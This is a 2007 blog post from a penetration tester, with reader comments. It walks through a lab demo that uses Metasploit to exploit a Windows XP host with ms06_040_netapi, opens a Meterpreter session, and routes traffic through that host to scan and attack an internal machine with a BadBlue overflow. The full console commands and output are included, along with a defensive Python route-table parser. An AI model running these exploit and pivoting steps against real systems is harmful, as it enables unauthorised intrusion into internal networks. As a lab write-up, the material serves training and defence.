Thursday, September 6, 2007

Using Metasploit to pivot through an exploited host


So I'm working on ChicagoCon slides and looking for a fun demo. Dean and I were talking about being able to pivot or relay through the victim into the internal network. I said I didn't think you could do it (he said you can)... the answer... you can. Yeah, I lost the bet :-)

http://www.metasploit.com/archive/framework/msg02580.html


So let's see it...

Bust your shell and get your Meterpreter session:

cg@segfault:~/evil/msf3$ ./msfconsole



=[ msf v3.1-dev
+ -- --=[ 217 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use exploit/windows/smb/ms06_040_netapi
msf exploit(ms06_040_netapi) > set RHOST 192.168.170.129
RHOST => 192.168.170.129
msf exploit(ms06_040_netapi) > set SMBPIPE SRVSVC
SMBPIPE => SRVSVC
msf exploit(ms06_040_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms06_040_netapi) > exploit
[*] Started bind handler
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.170.129[\SRVSVC] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.170.129[\SRVSVC] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.170.1:44656 -> 192.168.170.129:4444)


Run the route command to see what networks the victim can reach; you can also run ipconfig to see if the box is dual-NIC'ed.

meterpreter > route

Network routes
==============

Subnet           Netmask          Gateway
------           -------          -------
0.0.0.0          0.0.0.0          172.16.0.1
127.0.0.0        255.0.0.0        127.0.0.1
172.16.0.0       255.255.0.0      172.16.0.1
172.16.0.1       255.255.255.255  127.0.0.1
172.16.255.255   255.255.255.255  172.16.0.1
192.168.170.0    255.255.255.0    192.168.170.129
192.168.170.129  255.255.255.255  127.0.0.1
192.168.170.255  255.255.255.255  192.168.170.129
224.0.0.0        240.0.0.0        172.16.0.1
224.0.0.0        240.0.0.0        192.168.170.129
255.255.255.255  255.255.255.255  172.16.0.1
255.255.255.255  255.255.255.255  192.168.170.129

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0


AMD PCNET Family PCI Ethernet Adapter #2 - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:b1:cc:c4
IP Address : 172.16.0.1
Netmask : 255.255.0.0


AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:b1:cc:ba
IP Address : 192.168.170.129
Netmask : 255.255.255.0



Or use the handy-dandy script that comes with msf, get_local_subnets:

meterpreter > run get_local_subnets
Local subnet: 0.0.0.0/0.0.0.0
Local subnet: 172.16.0.0/255.255.0.0
Local subnet: 192.168.170.0/255.255.255.0



As you can see, there is an internal network.
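For readers who want to see how a list like the get_local_subnets output above falls out of a route table, here is a small added example (my own reconstruction of the filtering rules, not the script's source): it parses the `meterpreter > route` text from this post, drops host routes, loopback and multicast entries, and reports whether the host is multi-homed. The same check is what a defender runs over inventory data to find hosts that bridge two segments, since those are exactly the boxes a compromise on one side turns into a path to the other.

```python
"""Derive a host's directly attached subnets from a Windows-style route
table. Added example: the filtering rules are my own reconstruction of what
get_local_subnets reports, not the script's source code."""
import ipaddress

# Sample input: the `meterpreter > route` output from the post (subnet netmask gateway).
ROUTE_OUTPUT = """\
Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 172.16.0.1
127.0.0.0 255.0.0.0 127.0.0.1
172.16.0.0 255.255.0.0 172.16.0.1
172.16.0.1 255.255.255.255 127.0.0.1
172.16.255.255 255.255.255.255 172.16.0.1
192.168.170.0 255.255.255.0 192.168.170.129
192.168.170.129 255.255.255.255 127.0.0.1
192.168.170.255 255.255.255.255 192.168.170.129
224.0.0.0 240.0.0.0 172.16.0.1
224.0.0.0 240.0.0.0 192.168.170.129
255.255.255.255 255.255.255.255 172.16.0.1
255.255.255.255 255.255.255.255 192.168.170.129
"""


def parse_routes(text):
    """Return (subnet, netmask, gateway) IPv4Address tuples, skipping header/divider lines."""
    routes = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        try:
            subnet, netmask, gateway = (ipaddress.IPv4Address(p) for p in parts)
        except ipaddress.AddressValueError:
            continue  # "Subnet Netmask Gateway" header or "------" divider
        routes.append((subnet, netmask, gateway))
    return routes


def local_subnets(text):
    """Keep network routes only: drop /32 host routes (own interface, broadcast,
    limited-broadcast), loopback and multicast. Output uses the 'subnet/netmask'
    form that get_local_subnets prints, in table order, without duplicates."""
    seen = []
    for subnet, netmask, _gateway in parse_routes(text):
        if netmask == ipaddress.IPv4Address("255.255.255.255"):
            continue
        if subnet.is_loopback or subnet.is_multicast:
            continue
        entry = f"{subnet}/{netmask}"
        if entry not in seen:
            seen.append(entry)
    return seen


def attached_networks(text):
    """Non-default local subnets as IPv4Network objects (the default route is not an attached network)."""
    nets = []
    for entry in local_subnets(text):
        subnet, netmask = entry.split("/")
        if subnet == "0.0.0.0":
            continue
        nets.append(ipaddress.IPv4Network(f"{subnet}/{netmask}"))
    return nets


def is_multihomed(text):
    """True when the host sits on more than one network, i.e. it bridges segments
    and is worth flagging in a segmentation review."""
    return len(attached_networks(text)) > 1


if __name__ == "__main__":
    for entry in local_subnets(ROUTE_OUTPUT):
        print("Local subnet:", entry)
    print("attached:", [str(n) for n in attached_networks(ROUTE_OUTPUT)])
    print("multi-homed:", is_multihomed(ROUTE_OUTPUT))
```

Run against the post's table it prints the same three "Local subnet:" lines the script did and reports the host as multi-homed (172.16.0.0/16 plus 192.168.170.0/24). The first-octet checks come from the `ipaddress` module's `is_loopback` and `is_multicast`, so the same function works on route tables from other hosts.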

The post by hdm says to Ctrl+Z out of your Meterpreter session to background it, then set up a route in the msfconsole session:

meterpreter > ** (pressed Ctrl+Z here)
Background session 1? [y/N] y
msf exploit(ms06_040_netapi) > route
Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]

Route traffic destined to a given subnet through a supplied session.
The default comm is Local.

msf exploit(ms06_040_netapi) > route print

msf exploit(ms06_040_netapi) > route add 172.16.0.0 255.255.0.0 1

msf exploit(ms06_040_netapi) > route print

Active Routing Table
====================

Subnet      Netmask      Gateway
------      -------      -------
172.16.0.0  255.255.0.0  Session 1

msf exploit(ms06_040_netapi) > sessions -l

Active sessions
===============

Id  Description  Tunnel
--  -----------  ------
1   Meterpreter  192.168.170.1:44656 -> 192.168.170.129:4444


OK, so you can see that we should be routing traffic through there. Now, I tried to ping the host (which is 172.16.0.100 in this case) and that didn't work; I also couldn't get any of the scanner auxiliary modules to actually scan and find anything (on either network), which is a bummer.

But I did get the SMB scanner auxiliary module to work and give me back the correct answer, so I know it's working and passing data.

msf exploit(ms06_040_netapi) > back
msf > use auxiliary/scanner/smb/version
msf auxiliary(version) > set RHOSTS 172.16.0.100
RHOSTS => 172.16.0.100
msf auxiliary(version) > run
[*] 172.16.0.100 is running Windows 2000 Service Pack 0 - Service Pack 4
[*] Auxiliary module execution completed


I'm still playing with popping a shell on the internal net; thus far MSF says it's working, but when it comes time to interact with the shell it's just not happening.

msf > use exploit/windows/http/badblue_ext_overflow
msf exploit(badblue_ext_overflow) > set RHOST 172.16.0.100
RHOST => 172.16.0.100
msf exploit(badblue_ext_overflow) > set RPORT 8080
RPORT => 8080
msf exploit(badblue_ext_overflow) > show targets

Exploit targets:

Id  Name
--  ----
0   BadBlue 2.5 (Universal)

msf exploit(badblue_ext_overflow) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(badblue_ext_overflow) > exploit -z
[*] Started bind handler
[*] Sending stage (474 bytes)
[*] Command shell session 2 opened (Local Pipe -> Remote Pipe)
[*] Trying target BadBlue 2.5 (Universal)...
[*] Session 2 created in the background.

msf exploit(badblue_ext_overflow) > sessions -l

Active sessions
===============

Id  Description    Tunnel
--  -----------    ------
1   Meterpreter    192.168.170.1:45544 -> 192.168.170.129:4444
2   Command shell  Local Pipe -> Remote Pipe

msf exploit(badblue_ext_overflow) > sessions -i 2
[*] Starting interaction with 2...



** And that's about all I get; tried it with a few different sploits, same result :-(

The useradd payload does work, though.



If anyone has been here, let me know if there's a nifty little trick to make it happen.

-CG

3 comments:

Pento said...

Nice article!
I've wanted to learn the route feature of Metasploit for a long time =)

Anonymous said...

Does the route feature work with commands outside the Metasploit Framework?

Well, I mean, can I use hping3 for example from my Bash to ping the internal net while having a route set via MSF?

CG said...

@anonymous

At the moment, no. This is supposed to be available in Metasploit Pro when it comes out. I don't know if that's going to trickle down to the free version or not, though.